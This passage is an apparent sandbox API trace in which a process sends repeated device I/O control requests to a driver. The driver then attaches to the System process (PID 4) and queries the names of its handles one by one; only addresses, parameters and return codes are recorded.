PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.091] ObReferenceObjectByHandle (in: Handle=0xffffffff800006fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069366070, HandleInformation=0x0) returned 0x0 [0258.091] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.091] PsReleaseProcessExitSynchronization () returned 0x2 [0258.091] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa3a [0258.091] ObQueryNameString (in: Object=0xffffe00069366070, ObjectNameInfo=0xffffe0006a6c07c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a6c07c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.091] ObfDereferenceObject (Object=0xffffe00069366070) returned 0x8000 [0258.091] IoCompleteRequest () returned 0x0 [0258.092] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.092] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.092] PsAcquireProcessExitSynchronization () returned 0x0 [0258.092] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.092] ObReferenceObjectByHandle (in: Handle=0xffffffff80000700, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a388750, HandleInformation=0x0) returned 0x0 [0258.092] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.092] PsReleaseProcessExitSynchronization () returned 0x2 [0258.092] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa39 [0258.092] ObQueryNameString (in: Object=0xffffe0006a388750, ObjectNameInfo=0xffffe0006a2cb4c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2cb4c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.092] ObfDereferenceObject (Object=0xffffe0006a388750) returned 0x8000 [0258.092] IoCompleteRequest () returned 0x0 [0258.092] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.092] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.092] PsAcquireProcessExitSynchronization () returned 0x0 [0258.092] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.092] ObReferenceObjectByHandle (in: Handle=0xffffffff80000708, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006923ff20, HandleInformation=0x0) returned 0x0 [0258.092] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.092] PsReleaseProcessExitSynchronization () returned 0x2 [0258.092] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa38 [0258.092] ObQueryNameString (in: Object=0xffffe0006923ff20, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.092] ObfDereferenceObject (Object=0xffffe0006923ff20) returned 0x7fe0 [0258.092] IoCompleteRequest () returned 0x0 [0258.092] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.092] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.092] PsAcquireProcessExitSynchronization () returned 0x0 [0258.092] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.092] ObReferenceObjectByHandle (in: Handle=0xffffffff8000070c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006936c420, HandleInformation=0x0) returned 0x0 [0258.092] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.092] PsReleaseProcessExitSynchronization () returned 0x2 [0258.092] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa37 [0258.092] ObQueryNameString (in: Object=0xffffe0006936c420, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.092] ObfDereferenceObject (Object=0xffffe0006936c420) returned 0x7f03 [0258.092] IoCompleteRequest () returned 0x0 [0258.092] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0258.092] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.092] PsAcquireProcessExitSynchronization () returned 0x0 [0258.092] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.093] ObReferenceObjectByHandle (in: Handle=0xffffffff8000074c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a603c20, HandleInformation=0x0) returned 0x0 [0258.093] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.093] PsReleaseProcessExitSynchronization () returned 0x2 [0258.093] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa36 [0258.093] ObQueryNameString (in: Object=0xffffe0006a603c20, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.093] ObfDereferenceObject (Object=0xffffe0006a603c20) returned 0x8000 [0258.093] IoCompleteRequest () returned 0x0 [0258.093] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0258.093] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.093] PsAcquireProcessExitSynchronization () returned 0x0 [0258.093] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.093] ObReferenceObjectByHandle (in: Handle=0xffffffff80000780, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069983c50, HandleInformation=0x0) returned 0x0 [0258.093] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.093] PsReleaseProcessExitSynchronization () returned 0x2 [0258.093] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa35 [0258.093] ObQueryNameString (in: Object=0xffffe00069983c50, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.093] ObfDereferenceObject (Object=0xffffe00069983c50) returned 0x7fff [0258.093] IoCompleteRequest () returned 0x0 [0258.093] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0258.093] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.093] PsAcquireProcessExitSynchronization () returned 0x0 [0258.093] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.093] ObReferenceObjectByHandle (in: Handle=0xffffffff80000784, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069985f20, HandleInformation=0x0) returned 0x0 [0258.093] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.093] PsReleaseProcessExitSynchronization () returned 0x2 [0258.093] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa34 [0258.093] ObQueryNameString (in: Object=0xffffe00069985f20, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.093] ObfDereferenceObject (Object=0xffffe00069985f20) returned 0x7fff [0258.093] IoCompleteRequest () returned 0x0 [0258.093] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x2e, lpOverlapped=0x0) returned 1 [0258.093] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.093] PsAcquireProcessExitSynchronization () returned 0x0 [0258.093] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.093] ObReferenceObjectByHandle (in: Handle=0xffffffff8000078c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069fb8900, HandleInformation=0x0) returned 0x0 [0258.093] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.093] PsReleaseProcessExitSynchronization () returned 0x2 [0258.093] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa33 [0258.093] ObQueryNameString (in: Object=0xffffe00069fb8900, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.093] ObfDereferenceObject (Object=0xffffe00069fb8900) returned 0x8000 [0258.093] IoCompleteRequest () returned 0x0 [0258.094] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpOutBuffer=0x315480, lpBytesReturned=0x14d450, lpOverlapped=0x0) returned 0 [0258.094] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.094] PsAcquireProcessExitSynchronization () returned 0x0 [0258.094] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.094] ObReferenceObjectByHandle (in: Handle=0xffffffff800007a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.094] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.094] PsReleaseProcessExitSynchronization () returned 0x2 [0258.094] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa32 [0258.094] IoCompleteRequest () returned 0x0 [0258.094] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7a, lpOverlapped=0x0) returned 1 [0258.094] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.094] PsAcquireProcessExitSynchronization () returned 0x0 [0258.094] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.094] ObReferenceObjectByHandle (in: Handle=0xffffffff8000080c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699e1930, HandleInformation=0x0) returned 0x0 [0258.094] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.094] PsReleaseProcessExitSynchronization () returned 0x2 [0258.094] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa31 [0258.095] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0258.095] ObfDereferenceObject (Object=0xffffe000699e1930) returned 0x7ffd [0258.095] IoCompleteRequest () returned 0x0 [0258.095] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xc4, lpOverlapped=0x0) returned 1 [0258.095] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.095] PsAcquireProcessExitSynchronization () returned 0x0 [0258.095] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.095] ObReferenceObjectByHandle (in: Handle=0xffffffff80000818, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699e4d40, HandleInformation=0x0) returned 0x0 [0258.095] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.095] PsReleaseProcessExitSynchronization () returned 0x2 [0258.095] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa30 [0258.095] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0258.095] ObfDereferenceObject (Object=0xffffe000699e4d40) returned 0x8000 [0258.095] IoCompleteRequest () returned 0x0 [0258.095] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0258.095] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.095] PsAcquireProcessExitSynchronization () returned 0x0 [0258.095] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.095] ObReferenceObjectByHandle (in: Handle=0xffffffff80000890, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697c9c60, HandleInformation=0x0) returned 0x0 [0258.095] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.095] PsReleaseProcessExitSynchronization () returned 0x2 [0258.095] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa2f [0258.095] ObQueryNameString (in: Object=0xffffe000697c9c60, ObjectNameInfo=0xffffe0006a7aa7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a7aa7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.095] ObfDereferenceObject (Object=0xffffe000697c9c60) returned 0x8000 [0258.095] IoCompleteRequest () returned 0x0 [0258.095] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x22, lpOverlapped=0x0) returned 1 [0258.095] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.095] PsAcquireProcessExitSynchronization () returned 0x0 [0258.095] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.095] ObReferenceObjectByHandle (in: Handle=0xffffffff80000894, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000690ba4d0, HandleInformation=0x0) returned 0x0 [0258.095] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.095] PsReleaseProcessExitSynchronization () returned 0x2 [0258.095] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa2e [0258.095] ObQueryNameString (in: Object=0xffffe00068b696a0, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0258.095] ObfDereferenceObject (Object=0xffffe000690ba4d0) returned 0x7ffe [0258.095] IoCompleteRequest () returned 0x0 [0258.096] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x2e, lpOverlapped=0x0) returned 1 [0258.096] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.096] PsAcquireProcessExitSynchronization () returned 0x0 [0258.096] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.096] ObReferenceObjectByHandle (in: Handle=0xffffffff80000898, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006969ca50, HandleInformation=0x0) returned 0x0 [0258.096] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.096] PsReleaseProcessExitSynchronization () returned 0x2 [0258.096] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa2d [0258.096] ObQueryNameString (in: Object=0xffffe0006969ca50, ObjectNameInfo=0xffffe0006a3b07c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b07c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.096] ObfDereferenceObject (Object=0xffffe0006969ca50) returned 0x8000 [0258.096] IoCompleteRequest () returned 0x0 [0258.096] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xe2, lpOverlapped=0x0) returned 1 [0258.096] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.096] PsAcquireProcessExitSynchronization () returned 0x0 [0258.096] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.096] ObReferenceObjectByHandle (in: Handle=0xffffffff800008b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b50c20, HandleInformation=0x0) returned 0x0 [0258.096] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.096] PsReleaseProcessExitSynchronization () returned 0x2 [0258.096] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa2c [0258.096] ObQueryNameString (in: Object=0xffffe00069b50c20, ObjectNameInfo=0xffffe0006a6c07c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a6c07c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.096] ObfDereferenceObject (Object=0xffffe00069b50c20) returned 0x8000 [0258.096] IoCompleteRequest () returned 0x0 [0258.096] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xce, lpOverlapped=0x0) returned 1 [0258.096] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.096] PsAcquireProcessExitSynchronization () returned 0x0 [0258.096] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.096] ObReferenceObjectByHandle (in: Handle=0xffffffff800008c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b50ea0, HandleInformation=0x0) returned 0x0 [0258.096] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.096] PsReleaseProcessExitSynchronization () returned 0x2 [0258.096] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa2b [0258.096] ObQueryNameString (in: Object=0xffffe00069b50ea0, ObjectNameInfo=0xffffe0006a4087c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4087c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.096] ObfDereferenceObject (Object=0xffffe00069b50ea0) returned 0x8000 [0258.096] IoCompleteRequest () returned 0x0 [0258.097] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xe2, lpOverlapped=0x0) returned 1 [0258.097] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.097] PsAcquireProcessExitSynchronization () returned 0x0 [0258.097] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.097] ObReferenceObjectByHandle (in: Handle=0xffffffff800008c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b50a10, HandleInformation=0x0) returned 0x0 [0258.097] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.097] PsReleaseProcessExitSynchronization () returned 0x2 [0258.097] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa2a [0258.097] ObQueryNameString (in: Object=0xffffe00069b50a10, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.097] ObfDereferenceObject (Object=0xffffe00069b50a10) returned 0x8000 [0258.097] IoCompleteRequest () returned 0x0 [0258.097] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xe2, lpOverlapped=0x0) returned 1 [0258.097] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.097] PsAcquireProcessExitSynchronization () returned 0x0 [0258.097] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.097] ObReferenceObjectByHandle (in: Handle=0xffffffff800008c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698ed3d0, HandleInformation=0x0) returned 0x0 [0258.097] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.097] PsReleaseProcessExitSynchronization () returned 0x2 [0258.097] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa29 [0258.097] ObQueryNameString (in: Object=0xffffe000698ed3d0, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.097] ObfDereferenceObject (Object=0xffffe000698ed3d0) returned 0x8000 [0258.097] IoCompleteRequest () returned 0x0 [0258.097] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x14, lpOverlapped=0x0) returned 1 [0258.097] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.097] PsAcquireProcessExitSynchronization () returned 0x0 [0258.097] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, 